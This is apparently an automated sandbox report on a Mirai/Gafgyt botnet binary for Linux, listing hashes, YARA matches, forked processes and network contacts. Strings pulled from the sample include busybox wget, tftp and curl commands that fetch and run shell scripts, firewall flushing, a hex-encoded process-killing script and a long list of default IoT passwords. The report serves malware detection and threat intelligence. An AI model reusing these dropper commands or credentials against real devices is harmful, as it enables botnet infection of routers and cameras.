Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
i686.elf

Overview

General Information

Sample name:i686.elf
Analysis ID:1584570
MD5:167e952f5a106e6959c974b25b7056fc
SHA1:313856b0b2850aa735c42b38e08f5637fb80d0be
SHA256:967cdf3d5a9a1683076ad9018c0ae6c290cb125ee164bf150eb681f03877ea07
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Deletes system log files
Machine Learning detection for sample
Performs DNS TXT record lookups
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584570
Start date and time:2025-01-05 21:32:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 0s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:i686.elf
Detection:MAL
Classification:mal92.troj.evad.linELF@0/1@19/0
  • VT rate limit hit for: i686.elf
Command:/tmp/i686.elf
PID:6234
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB aNd fOxNoIntel lEarNs sHiT
Standard Error:
  • system is lnxubuntu20
  • i686.elf (PID: 6234, Parent: 6159, MD5: 167e952f5a106e6959c974b25b7056fc) Arguments: /tmp/i686.elf
    • i686.elf New Fork (PID: 6235, Parent: 6234)
    • i686.elf New Fork (PID: 6236, Parent: 6234)
    • i686.elf New Fork (PID: 6256, Parent: 6234)
    • i686.elf New Fork (PID: 6278, Parent: 6234)
    • i686.elf New Fork (PID: 6298, Parent: 6234)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
i686.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    i686.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
    • 0xe0e8:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
    i686.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
    • 0xe8d7:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
    i686.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
    • 0xa5e6:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    • 0xa748:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    i686.elfLinux_Trojan_Gafgyt_d996d335unknownunknown
    • 0x1130a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
    Click to see the 3 entries
    SourceRuleDescriptionAuthorStrings
    6278.1.0000000000400000.0000000000416000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6278.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0xe0e8:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      6278.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0xe8d7:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      6278.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
      • 0xa5e6:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      • 0xa748:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      6278.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_d996d335unknownunknown
      • 0x1130a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
      Click to see the 11 entries
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-05T21:35:22.598947+010020135141A Network Trojan was detected192.168.2.2351465208.67.222.22253UDP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: i686.elfReversingLabs: Detection: 34%
      Source: i686.elfJoe Sandbox ML: detected
      Source: i686.elfString: /bin/busybox echo -ne >> > upnpPon521rootZte521root621oelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafedbin20150602vstarcam2015supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenablelinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd rm -rf dvrEncoder rtspd dvrUpdater dvrDecoder dvrRecorder ptzcontrol .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2013514 - Severity 1 - ET MALWARE Potential DNS Command and Control via TXT queries : 192.168.2.23:51465 -> 208.67.222.222:53
      Source: global trafficTCP traffic: 38.60.221.89 ports 18234,45123,23016,1,2,3,4,8,31428,10321
      Source: global trafficTCP traffic: 156.244.6.20 ports 64715,62849,2,4,6,8,9,19823,5837
      Source: global trafficTCP traffic: 188.166.182.194 ports 45123,64715,23016,1,62849,4,5,6,7
      Source: global trafficTCP traffic: 192.168.2.23:34606 -> 38.60.221.89:31428
      Source: global trafficTCP traffic: 192.168.2.23:49596 -> 156.244.6.20:62849
      Source: global trafficTCP traffic: 192.168.2.23:49510 -> 188.166.182.194:64715
      Source: global trafficUDP traffic: 192.168.2.23:47201 -> 74.125.250.129:19302
      Source: /tmp/i686.elf (PID: 6234)Socket: 127.0.0.1:43478Jump to behavior
      Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
      Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
      Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
      Source: unknownTCP traffic detected without corresponding DNS query: 193.60.179.202
      Source: unknownTCP traffic detected without corresponding DNS query: 193.60.179.202
      Source: unknownTCP traffic detected without corresponding DNS query: 122.56.204.220
      Source: unknownTCP traffic detected without corresponding DNS query: 122.56.204.220
      Source: unknownTCP traffic detected without corresponding DNS query: 222.149.240.69
      Source: unknownTCP traffic detected without corresponding DNS query: 222.149.240.69
      Source: unknownTCP traffic detected without corresponding DNS query: 122.56.204.220
      Source: unknownTCP traffic detected without corresponding DNS query: 193.60.179.202
      Source: unknownTCP traffic detected without corresponding DNS query: 222.149.240.69
      Source: unknownTCP traffic detected without corresponding DNS query: 222.149.240.69
      Source: unknownTCP traffic detected without corresponding DNS query: 122.56.204.220
      Source: unknownTCP traffic detected without corresponding DNS query: 193.60.179.202
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 156.244.6.20
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: global trafficDNS traffic detected: DNS query: www.onlydance.cam
      Source: i686.elfString found in binary or memory: http:///curl.sh
      Source: i686.elfString found in binary or memory: http:///wget.sh
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      barindex
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: Initial sampleString containing 'busybox' found: usage: busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
      Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
      Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
      Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
      Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echo
      Source: Initial sampleString containing 'busybox' found: 191.235.89.0191.234.196.0191.235.53.0134.0.0.035.195.135.035.195.136.035.195.137.035.195.138.035.195.14.035.195.140.035.195.142.035.195.144.035.195.145.035.195.147.035.195.148.035.195.149.035.195.15.035.195.152.035.195.153.035.195.154.035.195.157.035.195.158.035.195.160.035.195.161.035.195.162.035.195.163.035.195.164.035.195.165.035.195.166.035.195.169.035.195.170.035.195.171.035.195.172.035.195.173.035.195.174.035.195.175.035.195.179.035.195.18.035.195.180.035.195.181.035.195.182.035.195.183.035.195.185.035.195.187.035.195.188.035.195.189.035.195.19.035.195.190.035.195.192.035.195.195.035.195.198.035.195.199.035.195.202.035.195.203.035.195.204.035.195.207.035.195.208.035.195.210.035.195.212.035.195.213.035.195.214.035.195.217.035.195.219.035.195.22.035.195.220.035.195.221.035.195.222.035.195.223.035.195.227.035.195.228.035.195.229.035.195.23.035.195.237.035.195.241.035.195.242.035.195.244.035.195.245.035.195.249.035.195.251.035.195.253.035.195.254.035.195.26.035.195.28.035.195.29.035.195.3.035.195.31.035.195
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnpPon521rootZte521root621oelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafedbin20150602vstarcam2015supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenablelinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd rm -rf dvrEncoder rtspd dvrUpdater dvrDecoder dvrRecorder ptzcontrol .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | s
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: /tmp/i686.elf (PID: 6235)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
